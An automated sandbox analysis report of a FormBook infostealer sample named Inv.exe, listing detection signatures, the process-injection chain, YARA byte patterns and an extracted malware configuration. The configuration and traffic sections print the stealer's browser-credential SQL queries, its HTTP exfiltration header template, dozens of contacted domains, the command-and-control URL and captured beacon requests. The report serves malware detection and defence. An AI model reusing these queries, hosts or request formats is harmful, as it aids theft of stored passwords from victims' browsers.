Loading ...

Play interactive tourEdit tour

Analysis Report Inv.exe

Overview

General Information

Sample Name:Inv.exe
Analysis ID:339347
MD5:a3aba7d40da6c8c86e4e8d035803f314
SHA1:469b36f05939d6ec6457f1b72ba9f6c7a960be06
SHA256:1f94eb81e3cde4f677fd210e1ff7f5d06987cbdc2fa7de79e28b224e49244b40
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Inv.exe (PID: 1848 cmdline: 'C:\Users\user\Desktop\Inv.exe' MD5: A3ABA7D40DA6C8C86E4E8D035803F314)
    • Inv.exe (PID: 4700 cmdline: 'C:\Users\user\Desktop\Inv.exe' MD5: A3ABA7D40DA6C8C86E4E8D035803F314)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 6448 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • NETSTAT.EXE (PID: 6460 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 6740 cmdline: /c del 'C:\Users\user\Desktop\Inv.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc3", "KEY1_OFFSET 0x1d6f3", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1d7ed", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1c373", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xb201d05d", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715030", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012164", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd015d1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "apartmentsineverettwa.com", "forritcu.net", "hotroodes.com", "skinnerttc.com", "royaltrustmyanmar.com", "adreslog.com", "kaysbridalboutiques.com", "multitask-improvements.com", "geniiforum.com", "smarthomehatinh.asia", "banglikeaboss.com", "javlover.club", "affiliateclubindia.com", "mycapecoralhomevalue.com", "comparamuebles.online", "newrochellenissan.com", "nairobi-paris.com", "fwk.xyz", "downdepot.com", "nextgenmemorabilia.com", "achonabu.com", "stevebana.xyz", "jacmkt.com", "weownthenight187.com", "divshop.pro", "wewearceylon.com", "skyreadymix.net", "jaffacorner.com", "bakerlibra.icu", "femalecoliving.com", "best20banks.com", "millcityloam.com", "signature-office.com", "qlifepharmacy.com", "dextermind.net", "fittcycleacademy.com", "davidoff.sucks", "1033393.com", "tutorsboulder.com", "bonicc.com", "goodberryjuice.com", "zhaowulu.com", "teryaq.media", "a-zsolutionsllc.com", "bitcoincandy.xyz", "cfmfair.com", "annefontain.com", "princesssexyluxwear.com", "prodigybrushes.com", "zzhqp.com", "hwcailing.com", "translatiions.com", "azery.site", "wy1917.com", "ringohouse.info", "chartershome.com", "thongtinhay.net", "2201virginiacondo5.com", "laurieryork.net", "mujeresnegociantes.com", "anchoriaswimwear.com", "michaelsala.com", "esdeportebici.com", "ninjitsoo.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.nationshiphop.com/hko6/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.Inv.exe.d90000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.Inv.exe.d90000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.Inv.exe.d90000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18419:$sqlite3step: 68 34 1C 7B E1
        • 0x1852c:$sqlite3step: 68 34 1C 7B E1
        • 0x18448:$sqlite3text: 68 38 2A 90 C5
        • 0x1856d:$sqlite3text: 68 38 2A 90 C5
        • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
        0.2.Inv.exe.d90000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.Inv.exe.d90000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: Inv.exeAvira: detected
          Found malware configurationShow sources
          Source: 0.2.Inv.exe.d90000.1.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc3", "KEY1_OFFSET 0x1d6f3", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1d7ed", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1c373", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xb201d05d", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715030", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012164", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd015d1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Multi AV Scanner detection for submitted fileShow sources
          Source: Inv.exeVirustotal: Detection: 39%Perma Link
          Source: Inv.exeReversingLabs: Detection: 45%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Inv.exeJoe Sandbox ML: detected
          Source: 0.2.Inv.exe.d90000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.Inv.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Inv.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Inv.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Inv.exe, 00000000.00000003.670292202.000000001A590000.00000004.00000001.sdmp, Inv.exe, 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Inv.exe, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Inv.exeCode function: 4x nop then pop esi1_2_004172FA
          Source: C:\Users\user\Desktop\Inv.exeCode function: 4x nop then pop ebx1_2_00407B05
          Source: C:\Users\user\Desktop\Inv.exeCode function: 4x nop then pop edi1_2_0040E44D
          Source: C:\Users\user\Desktop\Inv.exeCode function: 4x nop then pop edi1_2_00417D80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop esi4_2_003672FA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop ebx4_2_00357B05
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi4_2_0035E44D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi4_2_00367D80

          Networking:

          barindex
          Uses netstat to query active network connections and open portsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=9ExSQ4NEk+xqeDwz7kz53SpWI5tzJaWW64EQQFdVNavty5IFfZu+ty07sGNE8SwhRq/4 HTTP/1.1Host: www.millcityloam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=Ds6mycG6XVC6cOnx6IQpHboGdSODTK5baT5OF1Gnzp/H9CBW+9tUucbuBNfXcxevyFer HTTP/1.1Host: www.achonabu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p HTTP/1.1Host: www.a-zsolutionsllc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP HTTP/1.1Host: www.nationshiphop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.54.117.217 198.54.117.217
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: Joe Sandbox ViewASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
          Source: global trafficHTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=9ExSQ4NEk+xqeDwz7kz53SpWI5tzJaWW64EQQFdVNavty5IFfZu+ty07sGNE8SwhRq/4 HTTP/1.1Host: www.millcityloam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=Ds6mycG6XVC6cOnx6IQpHboGdSODTK5baT5OF1Gnzp/H9CBW+9tUucbuBNfXcxevyFer HTTP/1.1Host: www.achonabu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p HTTP/1.1Host: www.a-zsolutionsllc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP HTTP/1.1Host: www.nationshiphop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.millcityloam.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeX-Powered-By: PHP/5.6.40Content-Type: text/html; charset=UTF-8X-UA-Compatible: IE=edgeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://abccarpetcare.com/wp-json/>; rel="https://api.w.org/"X-LiteSpeed-Cache-Control: public,max-age=3600X-LiteSpeed-Tag: 2cd_404,2cd_URL.8baa36f0385195f985698a5c3d8ac84b,2cd_ERR.404,2cd_X-Litespeed-Cache: missTransfer-Encoding: chunkedDate: Wed, 13 Jan 2021 20:27:17 GMTServer: LiteSpeedData Raw: 34 35 37 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 62 63 63 61 72 70 65 74 63 61 72 65 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 41 42 43 20 43 61 72 70 65 74 20 43 61 72 65 20 26 23 38 32 31 31 3b 20 41 42 43 20 52 75 67 20 43 6c 65 61 6e 69 6e 67 20 4e 59 43 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 54 6f 74 61 6c 20 57 6f 72 64 50 72 65 73 73 20 54 68 65 6d 65 20 33 2e 36 2e 30 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 62 63 63 61 72 70 65 74 63 61 72 65 2e 63 6f 6d 27 20 2f 3e 